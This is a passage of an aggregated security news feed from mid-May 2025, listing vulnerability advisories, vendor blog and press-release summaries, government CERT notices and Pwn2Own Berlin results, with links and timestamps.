Chromium: CVE-2025-4609 Incorrect handle provided in unspecified circumstances in Mojo
2025-05-15T17:20:53Z | 1747329653

This CVE was assigned by Chrome.  Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-4609
Chromium: CVE-2025-4664 Insufficient policy enforcement in Loader
2025-05-15T17:20:49Z | 1747329649

This CVE was assigned by Chrome.  Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information. Google is aware of reports that an exploit for CVE-2025-4664 exists in the wild.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-4664
Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos RAT
2025-05-15T16:22:39Z | 1747326159

Cybercriminals are progressively turning PowerShell to launch stealthy attacks that evade traditional antivirus and endpoint defenses. By running code directly in memory, these threats leave minimal evidence on disk, making them particularly challenging to detect. A recent example is Remcos RAT, a well-known remote access trojan recognized for its persistence and stealth. It provides attackers […]

https://blog.qualys.com/category/vulnerabilities-threat-research
Senior US Officials Impersonated in Malicious Messaging Campaign
2025-05-15T16:00:00Z | 1747324800

Senior US Officials Impersonated in Malicious Messaging Campaign

https://www.ic3.gov/PSA/2025/PSA250515
Establishing MVC for Cyber Resilience
2025-05-15T15:18:28Z | 1747322308

Knowing your organization’s minimum viability helps enable continuous business. The post Establishing MVC for Cyber Resilience appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/establishing-mvc-for-cyber-resilience
Expression Payloads Meet Mayhem - Ivanti EPMM Unauth RCE Chain (CVE-2025-4427 and CVE-2025-4428)
2025-05-15T14:51:12Z | 1747320672

Keeping your ears to the ground and eyes wide open for the latest vulnerability news at watchTowr is a given. Despite rummaging through enterprise code looking for 0days on a daily basis, our interest was piqued this week when news of fresh vulnerabilities was announced in a close friend -

https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/
What’s new in Sysdig – May 2025
2025-05-15T14:15:00Z | 1747318500

Sysdig continues to evolve this May with major advancements in cloud exposure analysis, broader serverless coverage, simplified identity insights, and... The post What’s new in Sysdig – May 2025 appeared first on Sysdig.

https://sysdig.com/blog/whats-new-in-sysdig-may-2025/
What’s new in Sysdig – May 2025
2025-05-15T14:15:00Z | 1747318500

Sysdig continues to evolve this May with major advancements in cloud exposure analysis, broader serverless coverage, simplified identity insights, and... The post What’s new in Sysdig – May 2025 appeared first on Sysdig.

https://sysdig.com/blog/whats-new-in-sysdig-may-2025/
Top 5 features to look for in a cloud detection and response solution
2025-05-15T13:45:00Z | 1747316700

Modern enterprise environments come in a variety of flavors across public and private cloud and on-premises infrastructure. Attackers are keen... The post Top 5 features to look for in a cloud detection and response solution appeared first on Sysdig.

https://sysdig.com/blog/top-5-features-to-look-for-in-a-cdr-solution/
Top 5 features to look for in a cloud detection and response solution
2025-05-15T13:45:00Z | 1747316700

Modern enterprise environments come in a variety of flavors across public and private cloud and on-premises infrastructure. Attackers are keen... The post Top 5 features to look for in a cloud detection and response solution appeared first on Sysdig.

https://sysdig.com/blog/top-5-features-to-look-for-in-a-cdr-solution/
Sednit abuses XSS flaws to hit gov't entities, defense companies
2025-05-15T13:15:04Z | 1747314904

Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU

https://www.welivesecurity.com/en/videos/sednit-xss-govt-entities-defense-companies/
Threat landscape for industrial automation systems in Q1 2025
2025-05-15T13:07:40Z | 1747314460

Kaspersky ICS CERT shares trends and statistics on industrial threats in Q1 2025.

https://securelist.com/industrial-threat-report-q1-2025/116505/
Prioritizing CVEs in the Cloud
2025-05-15T13:00:54Z | 1747314054

Exploited CVEs are a leading cause of cloud breaches. Learn how to effectively mitigate them through context-aware risk prioritization.

https://www.sentinelone.com/blog/prioritizing-cves-in-the-cloud/
Locked Out and Held for Ransom: A City's Battle Against Cybercrime
2025-05-15T13:00:00Z | 1747314000

Read how having a plan and doing some preparation in advance can lessen the severity of a ransomware attack ? or prevent one altogether.

https://www.akamai.com/blog/security/2025/may/locked-out-held-ransom-citys-battle-against-cybercrime
Tenable Powers AI-Driven Exposure Management with Third-Party Data Connectors and Unified Dashboards
2025-05-15T13:00:00Z | 1747314000

Tenable®, the exposure management company, today announced powerful new enhancements to its flagship platform, Tenable One, with the introduction of Tenable One Connectors and customizable risk dashboards. These advancements — powered by Tenable ExposureAI™ and built on the Tenable Data Fabric — make Tenable One the most advanced exposure management solution available today. With third-party data connectors, organizations unlock a contextualized view of all their security risk data in one place, regardless of the security products they use.In today’s fragmented security landscape, large organizations juggle an average of 83 disconnected tools1, leading to siloed operations and critical blind spots. The result is scattered data and operational inefficiencies across the attack surface. Tenable One addresses this complexity by consolidating exposure insights from both native and third-party tools into a unified, contextual view, transforming fragmented data into business-aligned intelligence.Tenable One now features a vast and rapidly expanding ecosystem of out-of-the-box Connectors, enabling seamless integration with widely used third-party tools for endpoint detection and response (EDR), cloud security, vulnerability management, operational technology security, ticketing systems and more. With new Connectors launching throughout Q2 2025 and beyond, Tenable unifies security data across the enterprise, delivering a comprehensive and actionable view of organizational risk.At the core of the platform is the Tenable Exposure Data Fabric, a scalable, cloud-native architecture that ingests, normalizes, and connects data across the security ecosystem. This foundation feeds Tenable ExposureAI, the platform’s machine learning engine that surfaces toxic risk combinations and hidden attack paths, and prioritizes actions based on potential business impact. New unified risk dashboards further elevate the platform’s impact. Designed to eliminate time-consuming manual reporting, these dashboards offer fully customizable views that align to specific business roles and priorities. With flexible report configurations and powerful visualization options, security teams can deliver insights and communicate risks faster and with greater business impact. “The cybersecurity market is saturated with point solutions that operate in isolation, slowing security efforts and leaving organizations vulnerable,” said Steve Vintz, co-chief executive officer and chief financial officer, Tenable. “The power of Tenable One enables organizations to view risks across security tools in context and focus remediation efforts on the exposures that matter most.”These innovations mark a major milestone following Tenable’s acquisition of Vulcan Cyber and reinforce Tenable’s commitment to lead the exposure management market with unmatched breadth, intelligence and operational scale. Additional Information:See Tenable One in action by watching guided demos.Explore the Tenable Exposure Management Resource Center for videos, one-pagers and other resources to help you understand the value of exposure management and build an efficient program.Check out the Tenable Exposure Management Maturity Model to assess your organization's proactive security maturity level. Join the upcoming Tenable webinar titled, “Security Without Silos: How to Gain Real Risk Insights with Unified Exposure Management” on June 11, 2025 at 11 am ET and 10 am BST.1 IBM report, "Capturing the cybersecurity dividend", January 2025About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com. ###Media Contact:Tenabletenablepr@tenable.comForward-Looking StatementsThis press release includes forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995. All statements contained in this press release other than statements of historical fact are forward-looking statements and represent our views as of the date of this press release. The words “anticipate,” "believe,” “continue,” “estimate,” “expect,” “intend,” “may,” “will” and similar expressions are intended to identify forward-looking statements. We have based these forward-looking statements on our current expectations and projections about future events and financial trends that we believe may affect our financial condition, results of operations, business strategy, short-term and long-term business operations and objectives and financial needs. These forward-looking statements are subject to a number of assumptions and risks and uncertainties, many of which involve factors or circumstances that are beyond our control that could affect our financial results. These risks and uncertainties are detailed in the sections titled "Risk Factors" and "Management's Discussion and Analysis of Financial Condition and Results of Operations" in our Annual Report on Form 10-K for the year ended December 31, 2024 as well as other filings that we make from time to time with the SEC, which are available on the SEC's website at sec.gov. Moreover, we operate in a very competitive and rapidly changing environment. New risks emerge from time to time. It is not possible for our management to predict all risks, nor can we assess the impact of all factors on our business or the extent to which any factor, or combination of factors, may cause actual results to differ materially from those contained in any forward-looking statements we may make. In light of these risks, uncertainties and assumptions, the future events and trends discussed in this press release may not occur and actual results could differ materially and adversely from those anticipated or implied in any forward-looking statements. Except as required by law, we are under no obligation to update these forward-looking statements subsequent to the date of this press release, or to update the reasons if actual results differ materially from those anticipated in the forward-looking statements.

https://www.tenable.com/press-releases/tenable-powers-ai-driven-exposure-management-with-third-party-data-connectors-and-unified-dashboards
Navigating Incident Response Documentation
2025-05-15T13:00:00Z | 1747314000

Understanding Plans, Playbooks, and Runbooks When a cybersecurity breach or an unexpected disruption occurs, time is critical. Organizations must rely […]

https://www.guidepointsecurity.com/blog/navigating-incident-response-documentation/
Sophos MDR: New analyst response actions for Microsoft 365
2025-05-15T12:59:11Z | 1747313951

Powerful new capabilities enable Sophos MDR analysts to respond to M365 attacks on your behalf.

https://news.sophos.com/en-us/2025/05/15/sophos-mdr-new-analyst-response-actions-for-microsoft-365/
Beyond the kill chain: What cybercriminals do with their money (Part 5)
2025-05-15T12:00:52Z | 1747310452

In the last of our five-part series, Sophos X-Ops explores the implications and opportunities arising from threat actors’ involvement in real-world industries and crimes

https://news.sophos.com/en-us/2025/05/15/beyond-the-kill-chain-what-cybercriminals-do-with-their-money-part-5/
Beyond the kill chain: What cybercriminals do with their money (Part 4)
2025-05-15T12:00:49Z | 1747310449

In the fourth of our five-part series, Sophos X-Ops explores threat actors’ real-world criminal business interests

https://news.sophos.com/en-us/2025/05/15/beyond-the-kill-chain-what-cybercriminals-do-with-their-money-part-4/
Beyond the kill chain: What cybercriminals do with their money (Part 3)
2025-05-15T12:00:45Z | 1747310445

In the third of our five-part series, Sophos X-Ops explores the more legally and ethically dubious business interests of financially motivated threat actors

https://news.sophos.com/en-us/2025/05/15/beyond-the-kill-chain-what-cybercriminals-do-with-their-money-part-3/
Beyond the kill chain: What cybercriminals do with their money (Part 2)
2025-05-15T12:00:42Z | 1747310442

In the second of our five-part series, Sophos X-Ops investigates the so-called ‘white’ (legitimate) business interests of threat actors

https://news.sophos.com/en-us/2025/05/15/beyond-the-kill-chain-what-cybercriminals-do-with-their-money-part-2/
Market-Inspired GPU Allocation in AI Workloads: A Cybersecurity Use Case
2025-05-15T12:00:41Z | 1747310441

Learn how a self-adaptive GPU allocation framework that dynamically manages the computational needs of AI workloads of different assets/systems.

https://blogs.cisco.com/security/market-inspired-gpu-allocation-in-ai-workloads/
Beyond the kill chain: What cybercriminals do with their money (Part 1)
2025-05-15T12:00:24Z | 1747310424

Sophos X-Ops investigates what financially motivated threat actors invest their ill-gotten profits in, once the dust has settled

https://news.sophos.com/en-us/2025/05/15/beyond-the-kill-chain-what-cybercriminals-do-with-their-money-part-1/
Employee phishing training is working – but don’t get complacent
2025-05-15T11:22:11Z | 1747308131

Educating staff on how to avoid phishing attacks can cut the rate by 80%

https://www.itpro.com/security/phishing/employee-phishing-training-is-working-but-dont-get-complacent
Riasztás Microsoft termékeket érintő sérülékenységekről – 2025. május
2025-05-15T10:41:29Z | 1747305689

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2025-majus/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 19/2025
2025-05-15T10:27:22Z | 1747304842

This week, we talk about the updated Hyöky service and an upcoming webinar that will cover key questions to ask your software supplier.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-192025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 19/2025
2025-05-15T10:27:22Z | 1747304842

This week, we talk about the updated Hyöky service and an upcoming webinar that will cover key questions to ask your software supplier.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-192025
Webinar “Beyond Fear: rethinking cybersecurity awareness”
2025-05-15T10:19:13Z | 1747304353

Pozivamo vas da se prijavite i inspirirate sadržajem najavljenog webinara “Beyond Fear: rethinking cybersecurity awareness” ili “Iznad straha – promišljanje o svijesti o kibernetičkoj sigurnosti“. GÉANT će ugostiti međunarodno priznatog stručnjaka za kibernetičku sigurnost Briana Honana koji će kroz temu kibernetičke sigurnosti izvan okvira straha pokušati osporiti tradicionalne modele i programe podizanja svijesti utemeljene na strahu... The post Webinar “Beyond Fear: rethinking cybersecurity awareness” first appeared on CERT.hr.

https://www.cert.hr/webinar-beyond-fear-rethinking-cybersecurity-awareness/
Pwn2Own Berlin 2025: Day One Results
2025-05-15T10:10:50Z | 1747303850

Welcome to the first day of Pwn2Own Berlin 2025! We have 11 different attempts, including our first ever AI attempts. We’ll be updating this blog with results as we have them. And that bring Day One of #Pwn2Own Berlin to a close. We awarded $260,000 today, but more great research is yet to come. STAR Labs has an early lead on Master of Pwn, but it's anyone's game at this point. Stay tuned for more results as we go. SUCCESS - Pumpkin (@u1f383) from DEVCORE Research Team used an integer overflow to escalate privs on Red Hat Linux. He earns $20,000 and 2 Master of Pwn points. Going from user land to root. COLLISION - We have a bug collision. Although Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) successfully demonstrated his exploit of #NVIDIA Triton, the bug he used was known by the vendor (but not patched). He still earns $15K and 1.5 Master of Pwn points. SUCCESS - Chen Le Qi (@cplearns2h4ck) of STARLabs SG combined a UAF and an integer overflow to escalate to SYSTEM on #Windows 11. He earns $30,000 and 3 Master of Pwn points. FAILURE - Unfortunately, the team from Wiz Research could not get their exploit of the NVIDIA Triton Inference working within the time allotted. COLLISION - Hyunwoo Kim (@V4bel) and Wongi Lee (@_qwerty_po) of Theori were able to escalate to root on Red Hat Linux with an info leak and a UAF, but one of the bugs used was an N-day. They still win $15,000 and 1.5 Master of Pwn points. SUCCESS - The first ever winner of the AI category in Pwn2Own history is Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam). His successful exploitation of Chroma earns him $20,000 and 2 Master of Pwn points. SUCCESS - In a surprise to no one, Marcin Wiązowski's privilege escalation on Windows 11 is confirmed! He used an Out-of-Bounds Write to escalate to SYSTEM. His work earns him $30,000 and 3 Master of Pwn points. SUCCESS - Their enthusiasm was rewarded as Team Prison Break (Best of the Best 13th) used an integer overflow to escape Oracle VirtualBox and execute code on the underlying OS. They earn $40,000 and 4 Master of Pwn points. COLLISION - We have another collision - Viettel Cyber Security (@vcslab) targeting NVIDIA Triton Inference Server successfully demonstrated their exploit - however it was known to the vendor, but not yet patched. They still earn $15000 and 1.5 Master of Pwn Points SUCCESS - Hyeonjin Choi (@d4m0n_8) of Out Of Bounds earns $15,000 for a third round win and 3 Master of Pwn Points by successfully using a type confusion bug to escalate privileges in #Windows11 #Pwn2Own #P2OBerlin SUCCESS - Nicely done! Billy and Ramdhan of STAR Labs used a UAF to perform their Docker Desktop escape and execute code on the underlying OS. They earn $60,000 and 6 Master of Pwn Points.

https://www.thezdi.com/blog/2025/5/15/pwn2own-berlin-2025-day-one-results
Verint Master Class: How to Modernize Your Voice Channel with AI
2025-05-15T10:08:03Z | 1747303683

Recent consumer research confirms that a modern voice channel needs an intelligent virtual assistant that can offer superior customer service over the phone. The post Verint Master Class: How to Modernize Your Voice Channel with AI appeared first on Verint.

https://www.verint.com/resources/how-to-modernize-your-voice-channel-with-ai/
Cisco Catalyst SD-WAN Manager Arbitrary File Creation Vulnerability
2025-05-15T10:04:53Z | 1747303493

A vulnerability in the application data endpoints of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an authenticated, remote attacker to write arbitrary files to an affected system. This vulnerability is due to improper validation of requests to APIs. An attacker could exploit this vulnerability by sending malicious requests to an API within the affected system. A successful exploit could allow the attacker to conduct directory traversal attacks and write files to an arbitrary location on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwanarbfile-2zKhKZwJ Security Impact Rating: Medium CVE: CVE-2025-20187

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwanarbfile-2zKhKZwJ
NCSC statement: Incident impacting retailers
2025-05-15T09:59:23Z | 1747303163

The latest statement from the NCSC regarding the cyber incident impacting UK retailers

https://www.ncsc.gov.uk/news/retailers-incident
"Eesti äpi" ohuteavituste test näitas süsteemi toimivust ja parenduskohti
2025-05-15T09:04:07Z | 1747299847

Eile, 14. mail toimus esmakordselt ohuteavituse terviksüsteemi EE-ALARM testimine Kaitseväe suurõppuse Siil raames. "Eesti äpp" testis esmakordselt rakenduse ohuteavituse funktsiooni, mis kinnitas rakenduse toimimist. Samas ilmnesid ka mõned kitsaskohad, mille lahendamisega Riigi Infosüsteemi Amet (RIA) tegeleb.

https://ria.ee/uudised/eesti-api-ohuteavituste-test-naitas-susteemi-toimivust-ja-parenduskohti
OPSWAT Opens New Cybersecurity Lab and Office in Arlington, VA
2025-05-15T09:00:00Z | 1747299600

Critical infrastructure protection leader expands federal presence and national commitment to cybersecurity in the National Capital Region

https://www.opswat.com/blog/opswat-opens-new-cybersecurity-lab-office-in-arlington-va
Enhancing Security Operations With AI-Driven Policy Management
2025-05-15T08:54:43Z | 1747299283

The post Enhancing Security Operations With AI-Driven Policy Management appeared first on Cato Networks.

https://www.catonetworks.com/resources/enhancing-security-operations/
Data breaches: guidance for individuals and families
2025-05-15T08:48:15Z | 1747298895

How to protect yourself from the impact of data breaches

https://www.ncsc.gov.uk/guidance/data-breaches
Operation RoundPress
2025-05-15T07:22:04Z | 1747293724

ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities

https://www.welivesecurity.com/en/eset-research/operation-roundpress/
Building a Secure Digital World, One Block at a Time
2025-05-15T07:07:37Z | 1747292857

There’s something beautifully simple about Minecraft. At its core, it’s a game of blocks — plain, pixelated cubes that, with enough time and imagination, become castles, cities, even entire civilizations. Millions have spent hours crafting these digital worlds, block by block, defending them from threats, expanding into new territories, and constantly evolving their creations.  And... The post Building a Secure Digital World, One Block at a Time  appeared first on Cato Networks.

https://www.catonetworks.com/blog/building-secure-digital-world-one-block-at-time/
CVE-2025-47161 Microsoft Defender for Endpoint Elevation of Privilege Vulnerability
2025-05-15T07:00:00Z | 1747292400

Information published.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
ZDI-CAN-26000: CyberArk
2025-05-15T05:00:00Z | 1747285200

A CVSS score 7.0 AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Nikolett Sipos & Nabeel Ahmed from NTT Belgium' was reported to the affected vendor on: 2025-05-15, 22 days ago. The vendor is given until 2025-09-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26913: Anritsu
2025-05-15T05:00:00Z | 1747285200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-05-15, 22 days ago. The vendor is given until 2025-09-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26882: Anritsu
2025-05-15T05:00:00Z | 1747285200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-05-15, 22 days ago. The vendor is given until 2025-09-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26589: DreamFactory
2025-05-15T05:00:00Z | 1747285200

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Catalin Iovita, David Bors, Alexandru Postolache' was reported to the affected vendor on: 2025-05-15, 22 days ago. The vendor is given until 2025-09-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
High Threat Security Alert (A25-05-11): Multiple Vulnerabilities in Google Chrome
2025-05-15T04:00:00Z | 1747281600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Inscrições: workshop C-HUB sobre Gestão de Risco
2025-05-15T00:00:00Z | 1747267200

Estão a decorrer as inscrições para a ação de formação que vai decorrer no PACT - Parque do Alentejo de Ciência e Tecnologia , no dia 29 de maio, a partir das 09h30. A iniciativa da C-HUB conta com o  apoio do Centro de Competências em Cibersegurança do Alentejo, e tem como objetivo preparar as organizações quanto à identificação, avaliação e mitigação dos seus riscos de cibersegurança. À adoção de novas ferramentas digitais, por parte de empresas e entidades da administração pública, para corresponder à digitalização da economia, corresponde um aumento da presença digital, tornando-as mais vulneráveis a ciberataques que podem comprometer a sua atividade económica e reputacional. Baseado nos referenciais do Centro Nacional de Cibersegurança, o workshop promovido pelo C-HUB - Pólo de Inovação Digital de Cibersegurança, visa ser uma resposta à necessidade de uma abordagem baseada na gestão dos riscos, no domínio da cibersegurança, que deriva da Diretiva (UE) 2022/2555. permitindo que cada entidade e organização identifique os seus ativos mais críticos e adote as soluções mais adequadas para os proteger. No final da ação formativa pretende-se que os participantes fiquem mais preparados para a implementação de uma abordagem sistematizada e coerente ao processo de identificação, análise, avaliação e tratamento continuo dos riscos de cibersegurança. Público-alvo da ação de formação Membros do órgãos de gestão, direção e administração PME e e da Administração Pública entidades essenciais e importantes, bem como das entidades públicas relevantes, nos termos do disposto da Diretiva (UE) 2022/2555 (NIS2 Directive) das entidades críticas nos termos do disposto da Diretiva (UE) 2022/2557 (CER Directive) fornecedores de redes públicas de comunicações eletrónicas ou prestadores de serviços de comunicações eletrónicas acessíveis ao público, prestadores de serviços de confiança, registo de nomes de domínio de topo, prestadores de serviços de registo de nomes de domínio, e prestadores de serviços de sistemas de nomes de domínio. Profissionais de segurança da informação, privacidade e cibersegurança responsáveis de cibersegurança e de sistemas de informação, incluíndo CIO/CSO/CISOs profissionais de gestão de recursos humanos profissionais de segurança da informação e cibersegurança, envolvidos em iniciativas de avaliação, auditoria,consultoria, implementação e melhoria da capacidade e maturidade da segurança da informação profissionais de GRC (governança, risco e conformidade) nos domínios legal, técnico e organizacional encarregados de proteção de dados (EPD/DPO) InscriçõesVagas: 30 Valor de participação: 200€ + IVA  

https://dyn.cncs.gov.pt/pt/detalhe/art/135927/inscricoes-workshop-c-hub-sobre-gestao-de-risco
Misbehaving Modalities: Detecting Tools, Not Techniques
2025-05-15T00:00:00Z | 1747267200

We explore the concept of Execution Modality and how modality-focused detections can complement behaviour-focused ones.

https://www.elastic.co/security-labs/misbehaving-modalities
Smashing Security podcast #417: Hello, Pervert! – Sextortion scams and Discord disasters
2025-05-14T23:00:32Z | 1747263632

Don't get duped, doxxed, or drained! In this episode of "Smashing Security" we dive into the creepy world of sextortion scams, and investigate how crypto wallet firm Ledger's Discord server was hijacked in an attempt to phish for cryptocurrency recovery phrases. All this and more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault. Plus! Don't miss our featured interview with Drata's Matt Hillary.

https://grahamcluley.com/smashing-security-podcast-417/
Redefining the Global Edge: How Skyhigh’s Next-Gen POP Architecture Powers Agile, Sustainable SSE
2025-05-14T21:29:01Z | 1747258141

A foundational question every enterprise must ask when developing a Secure Service Edge (SSE) strategy is: “Will my vendor’s global... The post Redefining the Global Edge: How Skyhigh’s Next-Gen POP Architecture Powers Agile, Sustainable SSE appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/redefining-the-global-edge-how-skyhighs-next-gen-pop-architecture-powers-agile-sustainable-sse.html
Safeguarding SAP Systems Amid Rising Financial Fraud and Economic Stress
2025-05-14T20:21:37Z | 1747254097

SAP systems are the backbone of enterprise finance—and they’re under attack. As economic pressures rise, so do attempts to exploit financial platforms. From insider threats to ransomware and zero-day vulnerabilities, SAP’s critical role in handling billions of dollars daily makes it a high-value target. The recent disclosure of CVE-2025-31324, a critical zero-day in SAP NetWeaver (CVSS 10.0), exposed just […]

https://mixmode.ai/blog/safeguarding-sap-systems-amid-rising-financial-fraud-and-economic-stress/
Cisco Reports Third Quarter Earnings
2025-05-14T20:05:00Z | 1747253100

Cisco reported third quarter revenue of $14.1 billion, net income on a generally accepted accounting principles (GAAP) basis of $2.5 billion or $0.62 per share, and non-GAAP net income of $3.8 billion or $0.96 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-reports-third-quarter-earnings.html
Cisco Reports Third Quarter Earnings
2025-05-14T20:05:00Z | 1747253100

Cisco reported third quarter revenue of $14.1 billion, net income on a generally accepted accounting principles (GAAP) basis of $2.5 billion or $0.62 per share, and non-GAAP net income of $3.8 billion or $0.96 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-reports-third-quarter-earnings.html
Cisco Reports Third Quarter Earnings
2025-05-14T20:05:00Z | 1747253100

Cisco reported third quarter revenue of $14.1 billion, net income on a generally accepted accounting principles (GAAP) basis of $2.5 billion or $0.62 per share, and non-GAAP net income of $3.8 billion or $0.96 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-reports-third-quarter-earnings.html
Cisco Reports Third Quarter Earnings
2025-05-14T20:05:00Z | 1747253100

Cisco reported third quarter revenue of $14.1 billion, net income on a generally accepted accounting principles (GAAP) basis of $2.5 billion or $0.62 per share, and non-GAAP net income of $3.8 billion or $0.96 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-reports-third-quarter-earnings.html
[Control systems] Schneider Electric security advisory (AV25-277)
2025-05-14T20:04:34Z | 1747253074

https://cyber.gc.ca/en/alerts-advisories/control-systems-schneider-electric-security-advisory-av25-277
Jenkins security advisory (AV25-276)
2025-05-14T19:45:29Z | 1747251929

https://cyber.gc.ca/en/alerts-advisories/jenkins-security-advisory-av25-276
Juniper Networks security advisory (AV25-275)
2025-05-14T19:30:52Z | 1747251052

https://cyber.gc.ca/en/alerts-advisories/juniper-networks-security-advisory-av25-275
Google Chrome security advisory (AV25-274)
2025-05-14T17:29:37Z | 1747243777

https://cyber.gc.ca/en/alerts-advisories/google-chrome-security-advisory-av25-274
Palo Alto Networks security advisory (AV25-273)
2025-05-14T17:25:09Z | 1747243509

https://cyber.gc.ca/en/alerts-advisories/palo-alto-networks-security-advisory-av25-273
Sophos Firewall v21.5: DNS protection
2025-05-14T17:08:05Z | 1747242485

How to make the most of the new features in Sophos Firewall v21.5.

https://news.sophos.com/en-us/2025/05/14/sophos-firewall-v21-5-dns-protection/
AI-Powered SASE: Transforming Threat Detection and Response with VersaAI
2025-05-14T17:01:07Z | 1747242067

Secure your enterprise with AI-powered Versa SASE that boosts threat detection and response with real-time analytics, behavioral insights, and intelligent security automation for today’s digital landscape. The post AI-Powered SASE: Transforming Threat Detection and Response with VersaAI first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/ai-powered-sase-transforming-threat-detection-and-response-with-versaai/
Pwn2Own Berlin: The Full Schedule
2025-05-14T16:01:41Z | 1747238501

Willkommen and welcome to the inuaguaral Pwn2Own Berlin! Not only is this our first time at the OffensiveCon conference, but it’s also our first time including an AI category in the event. We’ve assembled some of the finest security researchers in the world to test the security of these systems, and we can’t wait to see what happens. We had our random drawing for the order of events earlier today, and from that, we have put together the following schedule. Please note that all times are local to Berlin and may change at any point. Jump to:    Day One           Day Two           Day Three Day One Thursday, May 15 – 1030Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting NVIDIA Triton Inference Server in the AI category for $30000 and 3 Master of Pwn Points.Thursday, May 15 – 1100Pumpkin (@u1f383) from DEVCORE Research Team targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for $20000 and 2 Master of Pwn Points.Thursday, May 15 – 1130Chen Le Qi (@cplearns2h4ck) of STARLabs SG targeting Microsoft Windows 11 in the Local Escalation of Privilege category for $30000 and 3 Master of Pwn Points.Thursday, May 15 – 1230Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting Chroma in the AI category for $20000 and 2 Master of Pwn Points.Thursday, May 15 – 1300Hyunwoo Kim (@V4bel) and Wongi Lee (@_qwerty_po) of Theori targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for $20000 and 2 Master of Pwn Points.Ronen Shustin (@ronenshh) Nir Ohfeld (@nirohfeld) of Wiz Research targeting NVIDIA Triton Inference Server in the AI category for $30000 and 3 Master of Pwn Points.Thursday, May 15 – 1330Marcin Wiązowski targeting Microsoft Windows 11 in the Local Escalation of Privilege category for $30000 and 3 Master of Pwn Points.Thursday, May 15 – 1430Team Prison Break (Best of the Best 13th) targeting Oracle VirtualBox in the Virtualization category for $40000 and 4 Master of Pwn Points.Billy(@st424204) and Ramdhan(@n0psledbyte) of STAR Labs targeting Docker Desktop in the Cloud/Container category for $60000 and 6 Master of Pwn Points.Thursday, May 15 – 1500Viettel Cyber Security (@vcslab) targeting NVIDIA Triton Inference Server in the AI category for $30000 and 3 Master of Pwn Points.Thursday, May 15 – 1530Hyeonjin Choi 